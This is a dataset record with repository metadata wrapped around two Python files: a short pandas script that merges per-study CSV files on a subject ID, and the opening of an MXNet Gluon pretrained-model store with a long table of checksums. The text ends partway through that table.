cdfb27cb4898005cc285358ae4ccef4aaed0d643
|
[] |
no_license
|
jzhao0802/ferring
|
cbd50bc632cb2a4604249a88aed9a116e9389c7b
|
a01ecc1a42401bc37123b2b75cd24caafe0218fc
|
refs/heads/master
| 2021-09-05T12:17:49.596891
| 2018-01-24T16:03:33
| 2018-01-24T16:03:33
| 119,166,839
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 903
|
py
|
# -*- coding: utf-8 -*-
import pandas as pd
import set_lib_paths
from functools import reduce
import os
def main(data_dir, study_code):
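    # Outer-join every per-study CSV in data_dir on USUBJID (skipping the combined
    # MERGED_COUNT_DATE.csv output itself) so subjects missing from any one table
    # are still retained, then write the merged result back into data_dir.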
dfs = [pd.read_csv(os.path.join(data_dir, filename)) for filename in os.listdir(data_dir) if '.csv' == filename[-4:] and 'MERGED_COUNT_DATE.csv' not in filename]
merged_df = reduce(lambda x,y: pd.merge(x, y, on='USUBJID', how='outer'), dfs)
pd.DataFrame.to_csv(merged_df, os.path.join(data_dir, 'MERGED_COUNT_DATE.csv'))
if __name__ == '__main__':
output_base_dir = 'F:/Projects/Ferring/data/pre_modelling/Miso-Obs-'
case_study_codes = ['303', '004']
for current_case_study_code in case_study_codes:
#case_study_index = 1
#current_case_study_code = case_study_codes[case_study_index]
output_dir = '%s%s/'%(output_base_dir, current_case_study_code)
main(output_dir, current_case_study_code)
|
[
"Shaun.Gupta@uk.imshealth.com"
] |
Shaun.Gupta@uk.imshealth.com
|
4f4845e3d3c44b24c019c06297e9dabefbfa99da
|
8325a9fced550c0754ea9727429ec88d5e843ff1
|
/gluon/gluoncv2/models/model_store.py
|
f9a7f91324afe907bf1b375410733d8324b58953
|
[
"MIT"
] |
permissive
|
agdyangkang/imgclsmob
|
61de85aa460b01a57a31062c2a7c8c5fae186e73
|
14f212e562bb255d5c27687415fd06dd86c1db6c
|
refs/heads/master
| 2020-05-30T22:47:24.814699
| 2019-05-31T19:55:15
| 2019-05-31T19:55:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 31,306
|
py
|
"""
Model store which provides pretrained models.
"""
__all__ = ['get_model_file']
import os
import zipfile
import logging
from mxnet.gluon.utils import download, check_sha1
_model_sha1 = {name: (error, checksum, repo_release_tag) for name, error, checksum, repo_release_tag in [
('alexnet', '2126', '9cb87ebd09523bec00e10d8ba9abb81a2c632e8b', 'v0.0.108'),
('vgg11', '1176', '95dd287d0eafa05f8c25a780e41c8760acdb7806', 'v0.0.109'),
('vgg13', '1112', 'a0db3c6c854c675e8c83040c35a80da6e5cdf15f', 'v0.0.109'),
('vgg16', '0869', '57a2556f64a7f0851f9764e9305126074334ef2d', 'v0.0.109'),
('vgg19', '0823', '0e2a1e0a9fdeb74dfef9aedd37712ad306627e35', 'v0.0.109'),
('bn_vgg11b', '1057', 'b2d8f382879075193ee128bc7997611462cfda33', 'v0.0.110'),
('bn_vgg13b', '1016', 'f384ff5263d4c79c22b8fc1a2bdc19c31e1b12b9', 'v0.0.110'),
('bn_vgg16b', '0865', 'b5e33db8aaa77e0a1336e5eb218345a2586f5469', 'v0.0.110'),
('bn_vgg19b', '0815', '3a0e43e66836ea5ab4f6d4c0425e2ab2abcb5766', 'v0.0.110'),
('bninception', '0776', '8314001b410c26120a9cf9e1d84a3770ba31b128', 'v0.0.139'),
('resnet10', '1385', 'a996427482bd5bd427db1d811d2a69bfd35987fc', 'v0.0.248'),
('resnet12', '1303', '8f492c28cd7c4c1bfc89c88649629e64487d5d00', 'v0.0.253'),
('resnet14', '1220', 'fcdddcef6a9fe9c472058e883a08cf09bbeb6738', 'v0.0.256'),
('resnetbc14b', '1116', 'c4ffed61c1b542e33794f22ab48bce568b9bf7bb', 'v0.0.309'),
('resnet16', '1088', '2bc07547e9d007825c89bdcf6879e346e7372028', 'v0.0.259'),
('resnet18_wd4', '1740', 'a74ea15d056a84133e02706a6c7f8ed8f50c8462', 'v0.0.262'),
('resnet18_wd2', '1284', '9a5154065311c8ffbbc57b20a443b205c7a910fa', 'v0.0.263'),
('resnet18_w3d4', '1066', '1a574a4198a5bbf01572c2b3f091eb824ff8196e', 'v0.0.266'),
('resnet18', '0951', '98a2545bf310e974848d96dee8da9095db623fbc', 'v0.0.153'),
('resnet26', '0837', 'd81d836f0e8808d7bc3d85db08207b91d4b2c68f', 'v0.0.305'),
('resnetbc26b', '0758', '2b5e8d0888936a340ea13c7e8ba30b237cd62f1c', 'v0.0.313'),
('resnet34', '0743', '5cdeeccda6f87fe13aed279213006061a8b42037', 'v0.0.291'),
('resnetbc38b', '0672', '820944641ba54f4aaa43d2a305ab52b9dcb740c7', 'v0.0.328'),
('resnet50', '0604', 'a71d1d2a8e8e4259742bbd67c386623233b57c6c', 'v0.0.329'),
('resnet50b', '0611', 'ca12f8d804000bf5202e2e3838dec7ef6b772149', 'v0.0.308'),
('resnet101', '0599', 'a6d3a5f4933794d56b61867c050ee730f6310f1b', 'v0.0.1'),
('resnet101b', '0539', '7406d85891b64717ae0a823d147e9e9e8921e868', 'v0.0.145'),
('resnet152', '0535', 'bbdd7ed1f33a9b33c75635d78143e8bd00e204e0', 'v0.0.144'),
('resnet152b', '0525', '6f30d0d99e1765e78370c92cd400f50eeb59b6f9', 'v0.0.143'),
('preresnet10', '1401', '2b96c0818dbabc422e98d8fbfc9b684c023922ed', 'v0.0.249'),
('preresnet12', '1321', 'b628efb5415784075e18b6734b1ba1e5c7280dee', 'v0.0.257'),
('preresnet14', '1218', 'd65fa6287414d9412e34ac0df6921eaa5646a2b6', 'v0.0.260'),
('preresnetbc14b', '1151', 'c712a235b75ad4956411bab265dfd924c748726e', 'v0.0.315'),
('preresnet16', '1081', '5b00b55f74adb9ee4a6ba5f946aafd48b4d8aa47', 'v0.0.261'),
('preresnet18_wd4', '1778', '3d949d1ae20b9188a423b56a1f7a89b4bcecc3d2', 'v0.0.272'),
('preresnet18_wd2', '1319', '63e55c24bc0ae93a8f8daefa4b35dc3e70147f65', 'v0.0.273'),
('preresnet18_w3d4', '1068', 'eb5698616757fd0947851f62c33fc4d7b4a5f23a', 'v0.0.274'),
('preresnet18', '0951', '71279a0b7339f1efd12bed737219a9ed76175a9d', 'v0.0.140'),
('preresnet26', '0834', 'c2ecba0948934c28d459b7f87fbc1489420fd4fb', 'v0.0.316'),
('preresnetbc26b', '0786', '265f591f320db0915c18c16f4ed0e2e53ee46567', 'v0.0.325'),
('preresnet34', '0751', 'ba9c829e72d54f8b02cf32ea202c195d36568467', 'v0.0.300'),
('preresnet50', '0620', '50f13b2d3fd197c8aa721745adaf2d6615fd8c16', 'v0.0.330'),
('preresnet50b', '0632', '951de2dc558f94f489ce62fedf979ccc08361641', 'v0.0.307'),
('preresnet101', '0575', 'e2887e539f2519c36aea0fc991d6503ed384c4fc', 'v0.0.2'),
('preresnet101b', '0588', '1015145a6228aa16583a975b9c33f879ee2a6fc0', 'v0.0.2'),
('preresnet152', '0532', '31505f719ad76f5aee59d37a695ac7a9b06230fc', 'v0.0.14'),
('preresnet152b', '0575', 'dc303191ea47ca258f5abadd203b5de24d059d1a', 'v0.0.2'),
('preresnet200b', '0564', '38f849a61f59924d85a9353923424889a77c93dc', 'v0.0.45'),
('preresnet269b', '0556', 'f386e3e70ab4df48fd8b444858bd6acd8afcbe6b', 'v0.0.239'),
('resnext14_32x4d', '1110', '9be6190e328c15a06703be3ba922d707c2f4d8e7', 'v0.0.327'),
('resnext26_32x4d', '0721', '5264d7efd606e1c95a2480050e9f03a7a2f02b09', 'v0.0.332'),
('resnext101_32x4d', '0579', '9afbfdbc5a420a9f56058be0bf80d12b21a627af', 'v0.0.10'),
('resnext101_64x4d', '0541', '0d4fd87b8de78c5c0295e1dcb9923a578dce7adb', 'v0.0.10'),
('seresnet50', '0644', '10954a846a56a387a6a222e260d95fb8a9bd68c3', 'v0.0.11'),
('seresnet101', '0589', '4c10238dd485a540a464bf1c39a8752d2da040b9', 'v0.0.11'),
('seresnet152', '0577', 'de6f099dd39f374390639ca8854b2954af3c59b9', 'v0.0.11'),
('seresnext50_32x4d', '0558', 'a49f8fb039973979afe2fc70974a8b07c7159bca', 'v0.0.12'),
('seresnext101_32x4d', '0500', 'cf1612601f319a0e75190ae756ae380b947dcb1a', 'v0.0.12'),
('senet154', '0465', 'dd2445078c0770c4a52cd22aa1d4077eb26f6132', 'v0.0.13'),
('ibn_resnet50', '0668', 'db527596f81f5b4aa1f0c490bf0ef5cfeef5fb76', 'v0.0.127'),
('ibn_resnet101', '0587', '946e7f1072a70b19f2bbc9776f73b818473482c3', 'v0.0.127'),
('ibnb_resnet50', '0697', '0aea51d29d4123676e447b92db800f5a574a35be', 'v0.0.127'),
('ibn_resnext101_32x4d', '0562', '05ddba79597927b5c0fa516d435c3788803438f6', 'v0.0.127'),
('ibn_densenet121', '0747', '1434d379777ff6b61469f7adc6ed73919da94f02', 'v0.0.127'),
('ibn_densenet169', '0682', '6d7c48c5519c6b8595223514564b1061268742a2', 'v0.0.127'),
('airnet50_1x64d_r2', '0621', '347358cc4a3ac727784665e8113cd11bfa79c606', 'v0.0.120'),
('airnet50_1x64d_r16', '0646', '0b847b998253ba22409eed4b939ec2158928a33f', 'v0.0.120'),
('airnext50_32x4d_r2', '0575', 'ab104fb5225b17836d523a525903db254f5fdd99', 'v0.0.120'),
('bam_resnet50', '0696', '7e573b617562d7dab94cda3b1a47ec0085aaeba2', 'v0.0.124'),
('cbam_resnet50', '0638', '78be56658e9f9452d7c2472c994b332d97807a17', 'v0.0.125'),
('pyramidnet101_a360', '0652', '08d5a5d1af3d514d1114ce76277223e8c1f5f426', 'v0.0.104'),
('diracnet18v2', '1117', '27601f6fa54e3b10d77981f30650d7a9d4bce91e', 'v0.0.111'),
('diracnet34v2', '0946', '1faa6f1245e152d1a3e12de4b5dc1ba554bc3bb8', 'v0.0.111'),
('crunet56', '0825', 'ad16523bfa306aefae5f931ed3bd6d01cd6d1804', 'v0.0.197'),
('densenet121', '0685', 'd3a1fae8b311343498f736e494d60d32e35debfb', 'v0.0.314'),
('densenet161', '0618', '52e30516e566bdef53dcb417f86849530c83d0d1', 'v0.0.3'),
('densenet169', '0689', '281ec06b02f407b4523245622371da669a287044', 'v0.0.3'),
('densenet201', '0636', '65b5d389b1f2a18c62dc39f74960266c601fec76', 'v0.0.3'),
('condensenet74_c4_g4', '0864', 'cde68fa2fcc9197e336717a17753a15a6efd7596', 'v0.0.4'),
('condensenet74_c8_g8', '1049', '4cf4a08e7fb46f5821049dcae97ae442b0ceb546', 'v0.0.4'),
('peleenet', '1125', '38d4fb245659a54204ca8f3562069b786eace1b1', 'v0.0.141'),
('wrn50_2', '0612', 'f8013e680bf802301e6830e5ca12de73382edfb1', 'v0.0.113'),
('drnc26', '0789', 'ee56ffabbcceba2e4063c80a3f84a4f4f8461bff', 'v0.0.116'),
('drnc42', '0692', 'f89c26d6a3792bef0850b7fe09ee10f715dcd3ce', 'v0.0.116'),
('drnc58', '0627', '44cbf15ccaea33ee1e91b780e70170e8e66b12d7', 'v0.0.116'),
('drnd22', '0852', '085747529f2d4a0490769e753649843c40dea410', 'v0.0.116'),
('drnd38', '0736', 'c7d53bc0f70196dda589fcf0bfac904b5d76d872', 'v0.0.116'),
('drnd54', '0627', '87d44c87953d98241f85007802a61e3cefd77792', 'v0.0.116'),
('drnd105', '0581', 'ab12d66220c1bbf4af5c33db78aaafc9f0d9bd5a', 'v0.0.116'),
('dpn68', '0658', '07251919c08640c94375670cbc5f0fbc312ed59b', 'v0.0.310'),
('dpn98', '0528', 'fa5d6fca985afde21f6374e4a4d4df788d1b4c3a', 'v0.0.17'),
('dpn131', '0522', '35ac2f82e69264e0712dcb979da4d99675e2f2aa', 'v0.0.17'),
('darknet_tiny', '1746', '16501793621fbcb137f2dfb901760c1f621fa5ec', 'v0.0.69'),
('darknet_ref', '1668', '3011b4e14b629f80da54ab57bef305d588f748ab', 'v0.0.64'),
('darknet53', '0556', 'e9486353868e0cf78bdc8fa377437de4d02733bb', 'v0.0.150'),
('irevnet301', '0897', 'cef9b5bfe9dd51c7d7946de432fd358f54239d35', 'v0.0.251'),
('bagnet9', '3544', 'ea1ae64532fc58e4efe585b3154aa4b42a677d77', 'v0.0.255'),
('bagnet17', '2152', '4b3a621287346dc836fe42de0b0888fb9a1c9075', 'v0.0.255'),
('bagnet33', '1495', '87527d8247b62bccfdd76a9d5e6e914ebfa5362a', 'v0.0.255'),
('dla34', '0821', '1127fa0a270ed5fe1112d9039cf44ee06ac18817', 'v0.0.202'),
('dla46c', '1286', '5b38b67fecf2d701b736eb23e1301b6dd7eb5fb9', 'v0.0.282'),
('dla46xc', '1225', 'e570f5f00a098b0de34e657f9d8caeda524d39f3', 'v0.0.293'),
('dla60', '0708', '954571d6917a836cb3433b664fd1b8330955c0fa', 'v0.0.202'),
('dla60x', '0621', '35774214758743caeae249482bcf8a0ab8caf456', 'v0.0.202'),
('dla60xc', '1074', '1b4e4048847e1ba060eb76538ee09e760f40be11', 'v0.0.289'),
('dla102', '0644', 'cadbb1cc5feb58497198aac2c8028c843a6d5a9f', 'v0.0.202'),
('dla102x', '0602', '193568a7ab3c0a3b6702fcc3e326b7fef011f752', 'v0.0.202'),
('dla102x2', '0553', '30c8f409240872053c5bb8523baeb274ba9da4ee', 'v0.0.202'),
('dla169', '0587', '4f3e6a6e604cc06ebcf63fc86cc5287399f32683', 'v0.0.202'),
('fishnet150', '0638', '5cbd08ec1534f2d5e7861395cc6f224ecbe8cb76', 'v0.0.168'),
('espnetv2_wd2', '2107', 'f2e17f0a8845b72f4645a0c06f2cfc8d9ef0253e', 'v0.0.238'),
('espnetv2_w1', '1427', '538f31fb92699fddabc27784fe746871fd8a635b', 'v0.0.238'),
('espnetv2_w5d4', '1273', 'b119ad9e52bf8c2d88db8eeb62a1fd6e23a1b6a6', 'v0.0.238'),
('espnetv2_w3d2', '1194', '3804a85006d874273b80026339b36943e9d813e5', 'v0.0.238'),
('espnetv2_w2', '0994', 'c212d81a9d12361b7d49ec841599f6a0f84f7b44', 'v0.0.238'),
('squeezenet_v1_0', '1734', 'e6f8b0e8253cef1c5c071dfaf2df5fdfc6a64f8c', 'v0.0.128'),
('squeezenet_v1_1', '1739', 'd7a1483aaa1053c7cd0cf08529b2b87ed2781b35', 'v0.0.88'),
('squeezeresnet_v1_0', '1767', '66474b9b6a771055b28c37b70621c026a1ef6ef4', 'v0.0.178'),
('squeezeresnet_v1_1', '1784', '26064b82773e7a7175d6038976a73abfcd5ed2be', 'v0.0.70'),
('sqnxt23_w1', '1866', '73b700c40de5f7be9d2cf4ed30cc8935c670a3c3', 'v0.0.171'),
('sqnxt23v5_w1', '1743', '7a83722e7d362cef950d8534020f837caf9e6314', 'v0.0.172'),
('sqnxt23_w3d2', '1321', '4d733bcd19f1e502ebc46b52f0b69d959636902e', 'v0.0.210'),
('sqnxt23v5_w3d2', '1268', '4f98bbd3841d8d09a067100841f64ce3eccf184a', 'v0.0.212'),
('sqnxt23_w2', '1063', '95d9b55a5e857298bdb7974db6e3dbd9ecc94401', 'v0.0.240'),
('sqnxt23v5_w2', '1024', '707246f323bc95d0ea2d5608e9e85ae9fe59773a', 'v0.0.216'),
('shufflenet_g1_wd4', '3677', 'ee58f36811d023e1b2e651469c470e588c93f9d3', 'v0.0.134'),
('shufflenet_g3_wd4', '3617', 'bd08e3ed6aff4993cf5363fe8acaf0b22394bea0', 'v0.0.135'),
('shufflenet_g1_wd2', '2238', 'f77dcd18d3b759a3046bd4a2443c40e4ff455313', 'v0.0.174'),
('shufflenet_g3_wd2', '2060', 'ea6737a54bce651a0e8c0b533b982799842cb1c8', 'v0.0.167'),
('shufflenet_g1_w3d4', '1675', '2f1530aa72ee04e3599c5296b590a835d9d50e7f', 'v0.0.218'),
('shufflenet_g3_w3d4', '1609', 'e008e926f370af28e587f349384238d240a0fc02', 'v0.0.219'),
('shufflenet_g1_w1', '1350', '01934ee8f4bf7eaf4e36dd6442debb84ca2a2849', 'v0.0.223'),
('shufflenet_g2_w1', '1332', 'f5a1479fd8523032ee17a4de00fefd33ff4d31e6', 'v0.0.241'),
('shufflenet_g3_w1', '1329', 'ac58d62c5f277c0e9e5a119cc1f48cb1fcfc8306', 'v0.0.244'),
('shufflenet_g4_w1', '1310', '73c039ebf56f9561dd6eecc4cbad1ab1db168ed1', 'v0.0.245'),
('shufflenet_g8_w1', '1319', '9a50ddd9ce67ec697e3ed085d6c39e3d265f5719', 'v0.0.250'),
('shufflenetv2_wd2', '1830', '156953de22d0e749c987da4a58e0e53a5fb18291', 'v0.0.90'),
('shufflenetv2_w1', '1123', '27435039ab7794c86ceab11bd93a19a5ecab78d2', 'v0.0.133'),
('shufflenetv2_w3d2', '0913', 'f132506c9fa5f0eb27398f9936b53423d0cd5b66', 'v0.0.288'),
('shufflenetv2_w2', '0823', '2d67ac62057103fd2ed4790ea0058e0922abdd0f', 'v0.0.301'),
('shufflenetv2b_wd2', '1782', '845a9c43cf4a9873f89c6116634e74329b977e64', 'v0.0.157'),
('shufflenetv2b_w1', '1101', 'f679702f7c626161413320160c6c9c199de9b667', 'v0.0.161'),
('shufflenetv2b_w3d2', '0879', '4022da3a5922127b1acf5327bd9f1d4d55726e05', 'v0.0.203'),
('shufflenetv2b_w2', '0810', '7429df751916bf24bd7fb86bc137ae36275b9d19', 'v0.0.242'),
('menet108_8x1_g3', '2030', 'aa07f925180834389cfd3bf50cb22d2501225118', 'v0.0.89'),
('menet128_8x1_g4', '1913', '0c890a76fb23c0af50fdec076cb16d0f0ee70355', 'v0.0.103'),
('menet160_8x1_g8', '2028', '4f28279a94e631f6a51735de5ea29703cca69845', 'v0.0.154'),
('menet228_12x1_g3', '1289', '2dc2eec7c9ebb41c459450e1843503b5ac7ecb3a', 'v0.0.131'),
('menet256_12x1_g4', '1216', '7caf63d15190648e266a4e7520c3ad677716f388', 'v0.0.152'),
('menet348_12x1_g3', '0936', '62c72b0b56460f062d4da7155bd64a524f42fb88', 'v0.0.173'),
('menet352_12x1_g8', '1167', '5892fea4e44eb27814a9b092a1a06eb81cea7844', 'v0.0.198'),
('menet456_24x1_g3', '0780', '7a89b32c89f878ac63fc96ddc71cb1a5e91c84d6', 'v0.0.237'),
('mobilenet_wd4', '2218', '3185cdd29b3b964ad51fdd7820bd65f091cf281f', 'v0.0.62'),
('mobilenet_wd2', '1330', '94f13ae1375b48892d8ecbb4a253bb583fe27277', 'v0.0.156'),
('mobilenet_w3d4', '1051', '6361d4b4192b5fc68f3409100d825e8edb28876b', 'v0.0.130'),
('mobilenet_w1', '0865', 'eafd91e9369abb09726f2168aba24453b17fc22e', 'v0.0.155'),
('fdmobilenet_wd4', '3053', 'd4f18e5b4ed63e5426eafbf5db7f8e2a97c28581', 'v0.0.177'),
('fdmobilenet_wd2', '1969', '242b9fa82d54f54f08b4bdbb194b7c89030e7bc4', 'v0.0.83'),
('fdmobilenet_w3d4', '1601', 'cb10c3e129706d3023d752e7402965af08f91ca7', 'v0.0.159'),
('fdmobilenet_w1', '1312', '95fa0092aac013c88243771faf66ef1134b7574d', 'v0.0.162'),
('mobilenetv2_wd4', '2412', 'd92b5b2dbb52e27354ddd673e6fd240a0cf27175', 'v0.0.137'),
('mobilenetv2_wd2', '1442', 'd7c586c716e3ea85e793f7c5aaf9cae2a907117b', 'v0.0.170'),
('mobilenetv2_w3d4', '1044', '768454f4bdaae337c180bb81248b8c5b8d31040b', 'v0.0.230'),
('mobilenetv2_w1', '0864', '6e58b1cb96852e4c6de6fc9cd11241384af21df9', 'v0.0.213'),
('igcv3_wd4', '2830', '71abf6e0b6bff1d3a3938bfea7c752b59ac05e9d', 'v0.0.142'),
('igcv3_wd2', '1703', '145b7089e1d0e0ce88f17393a357d5bb4ae37734', 'v0.0.132'),
('igcv3_w3d4', '1096', '3c7c86fc43df2e5cf95a451ebe07fccf2d9dc076', 'v0.0.207'),
('igcv3_w1', '0900', 'e2c3da1cffd8e42da7a052b80db2f86758c8d35b', 'v0.0.243'),
('mnasnet', '1144', 'c972fec0521e0222259934bf77c57ebeebff5bdf', 'v0.0.117'),
('darts', '0897', 'aafd645210df6b55587ef02f4edf08c76a15e5a3', 'v0.0.118'),
('proxylessnas_cpu', '0750', '256da7c8a05cd87a59e30e314b22dc1d4565946e', 'v0.0.324'),
('proxylessnas_gpu', '0724', 'd9ce80964e37fb30bddcc552f1d68361b1a94873', 'v0.0.333'),
('proxylessnas_mobile', '0780', 'b8bb5a64f333562475dcfc09eeb7e603d6e66afb', 'v0.0.326'),
('proxylessnas_mobile14', '0651', 'f08baec85343104994b821581cde3ee965a2c593', 'v0.0.331'),
('xception', '0556', 'bd2c1684a5dc41dd00b4676c194a967558ed577e', 'v0.0.115'),
('inceptionv3', '0559', '6c087967685135a321ed66b9ad2277512e9b2868', 'v0.0.92'),
('inceptionv4', '0525', 'f7aa9536392ea9ec7df5cc8771ff53c19c45fff2', 'v0.0.105'),
('inceptionresnetv2', '0494', '3328f7fa4c50c785b525e7b603926ec1fccbce14', 'v0.0.107'),
('polynet', '0453', '742803144e5a2a6148212570726350da09adf3f6', 'v0.0.96'),
('nasnet_4a1056', '0795', '5c78908e38c531283d86f9cbe7e14c2afd85a7ce', 'v0.0.97'),
('nasnet_6a4032', '0424', '73cca5fee009db77412c5fca7c826b3563752757', 'v0.0.101'),
('pnasnet5large', '0428', '998a548f44ac1b1ac6c4959a721f2675ab5c48b9', 'v0.0.114'),
('resnetd50b', '0549', '17d6004b5c6c1b97cfb47377ae5076810c5d88be', 'v0.0.296'),
('resnetd101b', '0461', 'fead1bcb86bba2be4ed7f0033fa972dc613e3280', 'v0.0.296'),
('resnetd152b', '0467', 'd0fe2fe09c6462de17aca4a72bbcb08b76a66e02', 'v0.0.296'),
('nin_cifar10', '0743', '9696dc1a8f67e7aa233836bcbdb99625769b1e86', 'v0.0.175'),
('nin_cifar100', '2839', 'eed0e9af2cd8e5aa77bb063204525812dbd9190f', 'v0.0.183'),
('nin_svhn', '0376', '7cb750180b0a981007194461bf57cfd90eb59c88', 'v0.0.270'),
('resnet20_cifar10', '0597', '13c5ab19145591d75873da3497be1dd1bd2afd46', 'v0.0.163'),
('resnet20_cifar100', '2964', '4e1443526ee96648bfe4d4954871a97a9c9622f4', 'v0.0.180'),
('resnet20_svhn', '0343', '7ac0d94a4563c9611092ce08f2124a3828103139', 'v0.0.265'),
('resnet56_cifar10', '0452', 'a73e63e9d0f3f7adde59b4142323c0dd05930de7', 'v0.0.163'),
('resnet56_cifar100', '2488', '590977100774a289b91088245dd2bd0cbe6567e6', 'v0.0.181'),
('resnet56_svhn', '0275', 'e676e4216a771b7d0339e87284c7ebb03af8ed25', 'v0.0.265'),
('resnet110_cifar10', '0369', 'f89f1c4d9fdd9e5cd00949a872211376979ff703', 'v0.0.163'),
('resnet110_cifar100', '2280', '6c5fa14bb4ced2dffe6ee1536306687aae57f9cb', 'v0.0.190'),
('resnet110_svhn', '0245', '0570b5942680cf88c66ae9a76c0e7ff0a41e71a6', 'v0.0.265'),
('resnet164bn_cifar10', '0368', 'e7941eeeddef9336664522eaa3af92d77128cac0', 'v0.0.179'),
('resnet164bn_cifar100', '2044', 'c7db7b5e6fbe6dc0f9501d25784f1a107c6e0315', 'v0.0.182'),
('resnet164bn_svhn', '0242', '8cdce67452d2780c7c69f4d0b979e80189d4bff8', 'v0.0.267'),
('resnet1001_cifar10', '0328', 'bb979d53089138b5060b418cad6c8ad9a940bf81', 'v0.0.201'),
('resnet1001_cifar100', '1979', '692d9516620bc8b7a4da30a98ebcb7432243f5e9', 'v0.0.254'),
('resnet1202_cifar10', '0353', '377510a63595e544333f6f57523222cd845744a8', 'v0.0.214'),
('preresnet20_cifar10', '0651', 'daa895737a34edda75c40f2d8566660590c84a3f', 'v0.0.164'),
('preresnet20_cifar100', '3022', '37f15365d48768f792f4551bd6ccf5259bc70530', 'v0.0.187'),
('preresnet20_svhn', '0322', '608cee12c0bc3cb59feea96386f6c12c6da91ba5', 'v0.0.269'),
('preresnet56_cifar10', '0449', 'cb37cb9d4524d4e0f5724aeed9face455f527efc', 'v0.0.164'),
('preresnet56_cifar100', '2505', '4c39e83f567f15d6ee0d69bf2dcaccd62067dfe5', 'v0.0.188'),
('preresnet56_svhn', '0280', 'b974c2c96a18ff2278f1d33df58c8537f9139ed9', 'v0.0.269'),
('preresnet110_cifar10', '0386', 'd6d4b7bd9f154eca242482a7559413d5c7b6d465', 'v0.0.164'),
('preresnet110_cifar100', '2267', '18cf4161c67c03e50cff7eb30988a559f3f97260', 'v0.0.191'),
('preresnet110_svhn', '0279', '6804450b744fa922d9ec22aa4c792d3a5da812f6', 'v0.0.269'),
('preresnet164bn_cifar10', '0364', '7ecf30cb818f80908ef4a77af4660c1080d0df81', 'v0.0.196'),
('preresnet164bn_cifar100', '2018', 'a20557c8968c04d8d07e40fdc5b0d1ec1fb3339d', 'v0.0.192'),
('preresnet164bn_svhn', '0258', '4aeee06affea89767c058fe1650b7476f05d8563', 'v0.0.269'),
('preresnet1001_cifar10', '0265', '50507ff74b6047abe6d04af6471d9bacafa05e24', 'v0.0.209'),
('preresnet1001_cifar100', '1841', '185e033d77e61cec588196e3fe8bf8dcb43acfab', 'v0.0.283'),
('preresnet1202_cifar10', '0339', '942cf6f22d80b5428256825234a252b8d6ebbe9d', 'v0.0.246'),
('resnext29_32x4d_cifar10', '0315', 'c8a1beda8ba616dc9af682d3ac172bfdd7a2472d', 'v0.0.169'),
('resnext29_32x4d_cifar100', '1950', '5f2eedcdd5cea6fdec1508f261f556a953ae28c2', 'v0.0.200'),
('resnext29_32x4d_svhn', '0280', 'dcb6aef96fbd76aa249e8f834093e2384b898404', 'v0.0.275'),
('resnext29_16x64d_cifar10', '0241', '76b97a4dd6185602a8ca8bdd77a70f8ddfcd4e83', 'v0.0.176'),
('resnext29_16x64d_cifar100', '1693', '1fcec90d6425e0405c61a1e90a80701ea556beca', 'v0.0.322'),
('pyramidnet110_a48_cifar10', '0372', '35b94d0575c2081a142e71955c8ceea8c51ec5e5', 'v0.0.184'),
('pyramidnet110_a48_cifar100', '2095', '00fd42a00492b2bbb28cacfb7b1a6c63072c37a3', 'v0.0.186'),
('pyramidnet110_a48_svhn', '0247', 'd8a5c6e20b6cc01989a52f9e307caf640169ed0a', 'v0.0.281'),
('pyramidnet110_a84_cifar10', '0298', '81710d7ab90838a8a299bf5f50aed2a3fa41f0e3', 'v0.0.185'),
('pyramidnet110_a84_cifar100', '1887', '6712d5dc69452f2fde1fcc3ee32c3164dcaffc4e', 'v0.0.199'),
('pyramidnet110_a270_cifar10', '0251', '1e769ce50ef915a807ee99907912c87766fff60f', 'v0.0.194'),
('pyramidnet110_a270_cifar100', '1710', '2732fc6430085192189fd7ccfd287881cc5a6c0d', 'v0.0.319'),
('pyramidnet164_a270_bn_cifar10', '0242', 'c4a79ea3d84344b9d352074122e37f593ee98fd2', 'v0.0.264'),
('pyramidnet164_a270_bn_cifar100', '1670', '08f46c7ff99e9c3fd7b5262e34dc8a00b316646f', 'v0.0.312'),
('pyramidnet200_a240_bn_cifar10', '0244', '52f4d43ec4d952f847c3a8e0503d5a4e6286679c', 'v0.0.268'),
('pyramidnet200_a240_bn_cifar100', '1609', 'e61e7e7eb6675aaf7a18461fea9bb3a53538d43b', 'v0.0.317'),
('pyramidnet236_a220_bn_cifar10', '0247', '1bd295a7fb834f639b238ffee818b3bde4126c81', 'v0.0.285'),
('pyramidnet236_a220_bn_cifar100', '1634', 'f066b3c6a4d217c42f5e8872fe23d343afe378ec', 'v0.0.312'),
('pyramidnet272_a200_bn_cifar10', '0239', 'd7b23c5460f059ac82ebc7b2cd992a203e098476', 'v0.0.284'),
('pyramidnet272_a200_bn_cifar100', '1619', '486e942734d91cd62d6bcbc283e1d7b56b734507', 'v0.0.312'),
('densenet40_k12_cifar10', '0561', '28dc0035549e51dcb53d1360707bd6f1558a5dcd', 'v0.0.193'),
('densenet40_k12_cifar100', '2490', '908f02ba7dbd7b8138f264193189e762a5590b1c', 'v0.0.195'),
('densenet40_k12_svhn', '0305', '645564c186a4e807293a68fb388803e36916e7b2', 'v0.0.278'),
('densenet40_k12_bc_cifar10', '0643', '7fdeda31c5accbddf47ab0f0b9a32cff723bf70d', 'v0.0.231'),
('densenet40_k12_bc_cifar100', '2841', '35cd8e6a2ae0896a8af2b689e076057fa19efa9b', 'v0.0.232'),
('densenet40_k12_bc_svhn', '0320', '6f2f98243fac9da22be26681bcd0a4d08e0f4baf', 'v0.0.279'),
('densenet40_k24_bc_cifar10', '0452', '13fa807e095b44ecaf3882e488b33a890d9d1e29', 'v0.0.220'),
('densenet40_k24_bc_cifar100', '2267', '2c4ef7c4bbe7f64784ad18b3845f4bf533f2ce57', 'v0.0.221'),
('densenet40_k24_bc_svhn', '0290', '03e136dd71bc85966fd2a4cb15692cfff3886df2', 'v0.0.280'),
('densenet40_k36_bc_cifar10', '0404', '4c154567e25619994a2f86371afbf1ad1e7475e9', 'v0.0.224'),
('densenet40_k36_bc_cifar100', '2050', 'd7275d39bcf439151c3bbeb707efa54943714b03', 'v0.0.225'),
('densenet40_k36_bc_svhn', '0260', 'b81ec8d662937851beecc62f36209fd8db464265', 'v0.0.311'),
('densenet100_k12_cifar10', '0366', '4e371ccb315d0fcd727a76255ca62ae9e92059cc', 'v0.0.205'),
('densenet100_k12_cifar100', '1964', '2ed5ec27a4d4a63876a4cacf52be53c91fbecb5f', 'v0.0.206'),
('densenet100_k12_svhn', '0260', '3e2b34b2087fe507a3672bfce1520747fca58046', 'v0.0.311'),
('densenet100_k24_cifar10', '0313', '9f795bac946d1390cf59f686b730fe512c406bd2', 'v0.0.252'),
